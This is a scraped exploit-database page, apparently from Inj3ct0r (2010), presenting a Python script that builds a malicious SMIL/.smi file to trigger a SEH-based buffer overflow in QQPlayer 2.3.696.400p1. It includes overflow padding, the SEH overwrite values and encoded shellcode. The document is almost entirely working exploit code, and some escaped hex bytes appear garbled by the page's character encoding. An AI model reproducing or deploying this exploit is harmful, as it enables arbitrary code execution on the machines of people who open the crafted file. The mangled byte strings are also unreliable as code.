Information Security News and Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>QQPlayer smi File Buffer Overflow Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================
QQPlayer smi File Buffer Overflow Exploit
=========================================

#!/usr/bin/env python

#################################################################
#
# Title: QQPlayer smi File Buffer Overflow Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: www.qq.com
# Platform: Windows XPSP3 Chinese Simplified
# Tested: QQPlayer 2.3.696.400p1
# Vulnerable: QQPlayer&lt;=2.3.696.400p1
#
#################################################################
# Code :

head =”’&lt;smil&gt;
&lt;head&gt;
&lt;meta name=&quot;title&quot; content=&quot;_&quot;/&gt;
&lt;meta name=&quot;author&quot; content=&quot;Warner Music Group”’

junk = &quot;A&quot; * 2001
nseh =&quot;x42×61x21×61&quot;
seh =&quot;x39×0cx41×00&quot;
adjust=&quot;x30×83xc0×0b&quot;
shellcode=(&quot;PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV&quot;
&quot;QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL&quot;
&quot;KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9&quot;
&quot;QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW&quot;
&quot;TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R&quot;
&quot;HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA&quot;)
junk_=&quot;R&quot;*8000
foot =”’&quot;/&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;seq&gt;
&lt;video src=&quot;rtsp://sos08-1-rm.eams.net/lis/424444/.uid.M0001&quot; title=&quot;_&quot;fill=&quot;freeze&quot;/&gt;
&lt;/seq&gt;
&lt;/body&gt;
&lt;/smil&gt;
&lt;!– Generated by Akamai Stream OS BOSS (v10.0.14-20100129) / d366992c –&gt;”’
payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot

fobj = open(&quot;poc.smi&quot;,&quot;w&quot;)
fobj.write(payload)
fobj.close()

# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-27]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13485